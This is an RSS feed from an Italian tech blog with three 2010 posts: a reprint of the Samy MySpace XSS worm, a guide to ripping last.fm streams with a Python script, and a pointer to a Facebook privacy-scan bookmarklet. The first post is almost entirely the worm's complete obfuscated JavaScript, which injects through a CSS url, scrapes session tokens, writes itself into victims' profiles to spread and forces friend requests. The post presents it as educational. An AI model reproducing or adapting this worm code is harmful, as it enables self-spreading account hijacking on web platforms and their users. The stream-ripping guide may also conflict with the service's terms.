<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Nicola Moretti - Hanicker IT Blog &#187; Hacks</title>
	<atom:link href="http://blog.nicolamoretti.com/category/informatica/hacks/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nicolamoretti.com</link>
	<description>Tecnologia e Digital Hacks</description>
	<lastBuildDate>Thu, 12 Aug 2010 22:51:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>Myspace old XSS virus</title>
		<link>http://blog.nicolamoretti.com/2010/08/myspace-old-xss-virus/</link>
		<comments>http://blog.nicolamoretti.com/2010/08/myspace-old-xss-virus/#comments</comments>
		<pubDate>Thu, 12 Aug 2010 22:48:37 +0000</pubDate>
		<dc:creator>Nick</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[myspace]]></category>
		<category><![CDATA[worm]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.nicolamoretti.com/?p=377</guid>
		<description><![CDATA[<br/>A volte anche un vecchio worm js può risultare utile a livello didattico, anche per capire come sia difficile limitare i danni di eventuali falle XSS. La sfida è semplice, ecco il codice: &#60;div id=mycode style="BACKGROUND: url('java&#60;br /&#62; script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&#38;');var AS=new Array();for(var O=0;O&#60;F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return [...]]]></description>
			<content:encoded><![CDATA[<br/><p><a href="http://blog.nicolamoretti.com/wp-content/uploads/2010/08/samytshirt.jpg" ><img class="alignleft size-medium wp-image-378" style="margin-left: 5px; margin-right: 5px;" title="samytshirt" src="http://blog.nicolamoretti.com/wp-content/uploads/2010/08/samytshirt-300x278.jpg" alt="" width="300" height="278" /></a>A volte anche un vecchio worm js può risultare utile a livello didattico, anche per capire come sia difficile limitare i danni di eventuali falle XSS.</p>
<p>La sfida è semplice, ecco il codice:</p>
<pre class="javascript" name="code">&lt;div id=mycode style="BACKGROUND: url('java&lt;br /&gt; script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&amp;');var AS=new Array();for(var O=0;O&lt;F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O&gt;0){N+='&amp;'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&amp;')!=-1){Q=Q.replace('&amp;','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&amp;'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. &lt;d'+'iv id='+AE+'D'+'IV&gt;'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','&lt;/td&gt; &lt;p&gt;');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&amp;Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&amp;Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&amp;friendID='+AN+'&amp;Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&amp;friendID=11851658&amp;Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&amp;Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"&gt;&lt;/DIV&gt; </pre>
<p>Il codice permetteva di guadagnare velocemente amici su MySpace, tanto da meritarsi una <a rel="nofollow" href="http://en.wikipedia.org/wiki/Samy_%28XSS%29" >pagina su wikipedia</a>.</p>
<p>Se avete problemi nell&#8217;analisi, ecco il <a href="http://namb.la/popular/tech.html" >link di riferimento</a> per l&#8217;analisi. <a href="http://namb.la/popular/tech.html" >Qui</a>, invece, è disponibile la storia di questo bug.</p>
<p><a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Google Reader" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a href="http://www.addtoany.com/add_to/orkut?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Orkut" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/orkut.png" width="16" height="16" alt="Orkut"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/myspace?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="MySpace" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/myspace.png" width="16" height="16" alt="MySpace"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a> <a href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a> <a href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a> <a href="http://www.addtoany.com/add_to/netlog?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Netlog" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/netlog.png" width="16" height="16" alt="Netlog"/></a> <a href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Tumblr" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F08%2Fmyspace-old-xss-virus%2F&amp;linkname=Myspace%20old%20XSS%20virus" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.nicolamoretti.com/2010/08/myspace-old-xss-virus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>last.fm &#8211; Scaricare gli stream</title>
		<link>http://blog.nicolamoretti.com/2010/05/last-fm-scaricare-gli-stream/</link>
		<comments>http://blog.nicolamoretti.com/2010/05/last-fm-scaricare-gli-stream/#comments</comments>
		<pubDate>Sun, 23 May 2010 13:56:47 +0000</pubDate>
		<dc:creator>Nick</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Musica]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[last.fm]]></category>
		<category><![CDATA[lastfm]]></category>
		<category><![CDATA[radio]]></category>
		<category><![CDATA[rip]]></category>
		<category><![CDATA[stream]]></category>

		<guid isPermaLink="false">http://blog.nicolamoretti.com/?p=255</guid>
		<description><![CDATA[<br/>Per il download degli stream di last.fm esistono moltissime soluzioni. Per Ubuntu, ad esempio, è molto usato il pacchetto thelastripper, scaricabile direttamente dai repository ufficiali. Ultimamente però quasi tutte le soluzioni sembrano aver smesso di funzionare, e gli autori di questi software tardano ad aggiornare i propri programmi. Un&#8217;ottima soluzione, per chi sa fare a [...]]]></description>
			<content:encoded><![CDATA[<br/><p><a href="http://blog.nicolamoretti.com/wp-content/uploads/2010/05/last-fm_logo.jpg" ><img class="alignleft size-full wp-image-265" style="margin: 4px 8px;" title="last-fm_logo" src="http://blog.nicolamoretti.com/wp-content/uploads/2010/05/last-fm_logo.jpg" alt="" width="171" height="145" /></a></p>
<p>Per il download degli stream di last.fm esistono moltissime soluzioni.</p>
<p>Per Ubuntu, ad esempio, è molto usato il pacchetto <strong>thelastripper</strong>, scaricabile direttamente dai repository ufficiali.</p>
<p>Ultimamente però quasi tutte le soluzioni sembrano aver smesso di funzionare, e gli autori di questi software tardano ad aggiornare i propri programmi.</p>
<p>Un&#8217;ottima soluzione, per chi sa fare a meno di interfacce grafiche, è uno<strong> script scritto in Python</strong> da Phillip Berndt e disponibile per il download al <a href="http://www.pberndt.com/raw//Programme/Linux/lastfm-rip/_download/lastfm-rip.py" >sito ufficiale</a> o <a href="http://www.multiupload.com/2L8FT6ZG4P" >tramite questo mirror</a>.</p>
<p><a href="http://www.pberndt.com/Programme/Linux/lastfm-rip/_download/lastfm-rip.py" >Qui potete vedere il codice sorgente online.</a></p>
<p>Il funzionamento è estremamente semplice.</p>
<p>Ad esempio vi basterà scrivere</p>
<p>python lastfm-rip.py -u USERNAME -p &#8220;PASSWORD&#8221; -d &#8220;CARTELLADESTINAZIONE&#8221; -k lastfm://user/USERNAME/recommended/</p>
<p>per  scaricare lo stream delle musiche consigliate.</p>
<p><strong>Esistono anche altre utili opzioni:</strong></p>
<blockquote><p>Usage: lastfm-rip.py [options] &lt;lastfm-url&gt;</p>
<p>Options:<br />
-h, &#8211;help            show this help message and exit<br />
-u USERNAME, &#8211;username=USERNAME<br />
Last.FM username<br />
-p PASSWORD, &#8211;password=PASSWORD<br />
Last.FM password<br />
-a ARTIST, &#8211;artist=ARTIST<br />
Play similar artists<br />
-d DIRECTORY, &#8211;directory=DIRECTORY<br />
Store files to this directory<br />
-f FILTER, &#8211;filter=FILTER<br />
Apply argument as a regex to filter songs (artist -<br />
title)<br />
-r, &#8211;enqueue-rythmbox<br />
Enqueue downloaded songs in Rythmbox (Requires dbus<br />
and pygtk)<br />
-n NUMBER, &#8211;fetch-n-songs=NUMBER<br />
Try to fetch exactly n songs, then exit<br />
-k, &#8211;keep-list       Keep a persistent list of downloaded songs so this<br />
will never download the same song twice</p></blockquote>
<p>Per quanto riguarda l&#8217;url da cui ricevere lo stream, ecco un prospetto (tratto da <a href="http://www.bstegmaier.de/wiki/index.php/Last.fm_URL_schemes" >questa pagina</a>) di quelli supportati da last.fm:</p>
<blockquote><p>lastfm://user/$user/personal<br />
lastfm://user/$user/playlist<br />
lastfm://user/$user/loved<br />
lastfm://user/$username/neighbours<br />
lastfm://user/$username/recommended/100</p>
<p>lastfm://usertags/$user/$tag<br />
lastfm://globaltags/$tag</p>
<p>lastfm://artist/$artist<br />
lastfm://artist/$artist/similarartists<br />
lastfm://artist/$artist/fans</p>
<p>lastfm://group/$groupname</p>
<p>lastfm://play/tracks/$trackid,$trackid,$trackid</p></blockquote>
<p><em>Non posso essere ritenuto responsabile per qualsiasi uso scorretto o  illegale delle informazioni contenute in questa pagina.</em></p>
<p><a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Google Reader" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a href="http://www.addtoany.com/add_to/orkut?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Orkut" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/orkut.png" width="16" height="16" alt="Orkut"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/myspace?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="MySpace" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/myspace.png" width="16" height="16" alt="MySpace"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a> <a href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a> <a href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a> <a href="http://www.addtoany.com/add_to/netlog?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Netlog" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/netlog.png" width="16" height="16" alt="Netlog"/></a> <a href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Tumblr" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F05%2Flast-fm-scaricare-gli-stream%2F&amp;linkname=last.fm%20%26%238211%3B%20Scaricare%20gli%20stream" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.nicolamoretti.com/2010/05/last-fm-scaricare-gli-stream/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Impostazioni Privacy Facebook</title>
		<link>http://blog.nicolamoretti.com/2010/05/impostazioni-privacy-facebook/</link>
		<comments>http://blog.nicolamoretti.com/2010/05/impostazioni-privacy-facebook/#comments</comments>
		<pubDate>Tue, 18 May 2010 01:01:38 +0000</pubDate>
		<dc:creator>Nick</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://blog.nicolamoretti.com/?p=250</guid>
		<description><![CDATA[<br/>Una volta registrati a Facebook la privacy dei nostri dati è messa a dura prova. Il rischio maggiore è sicuramente il temuto upgrade di sistema che, di tanto in tanto, viene attuato dai tecnici dell&#8217;azienda di Palo Alto. Molto spesso questo vuol dire che le impostazioni relative alla privacy che abbiamo configurato poco tempo fa [...]]]></description>
			<content:encoded><![CDATA[<br/><p>Una volta registrati a <strong>Facebook</strong> la <strong>privacy</strong> dei nostri dati è messa a dura prova. Il rischio maggiore è sicuramente il temuto <strong>upgrade di sistema</strong> che, di tanto in tanto, viene attuato dai tecnici dell&#8217;azienda di Palo Alto. Molto spesso questo vuol dire che le impostazioni relative alla privacy che abbiamo configurato poco tempo fa non sono piu valide ed è tutto da risistemare il prima possibile.</p>
<p>Uno strumento appena nato ma molto efficace per controllare velocemente se le impostazioni del nostro profilo sono &#8220;buone&#8221; è <a href="http://www.reclaimprivacy.org/" >ReclaimPrivacy</a>.</p>
<p>Il funzionamento è molto semplice:</p>
<p><em>una volta visitato il sito </em><a href="http://www.reclaimprivacy.org/" ><em>http://www.reclaimprivacy.org/</em></a><em> è sufficiente aggiungere ai nostri segnalibri il link indicato dalla scritta </em><strong><em>Scan for Privacy</em></strong><em>.</em></p>
<p><em>A questo punto ci basterà accedere alla home page di facebook e quindi premere sul link per ricevere un report globale ed eventualmente alcuni suggerimenti efficaci su come migliorare determinate impostazioni.</em></p>
<p><a href="http://blog.nicolamoretti.com/wp-content/uploads/2010/05/img-1.jpg" ><img class="aligncenter size-full wp-image-252" title="Facebook privacy" src="http://blog.nicolamoretti.com/wp-content/uploads/2010/05/img-1.jpg" alt="" width="581" height="183" /></a></p>
<p>Avendo a disposizione anche il codice sorgente di questo script possiamo verificarne facilmente la sua affidabilità: i dati che andrà a verificare non verranno comunicati a nessuno.</p>
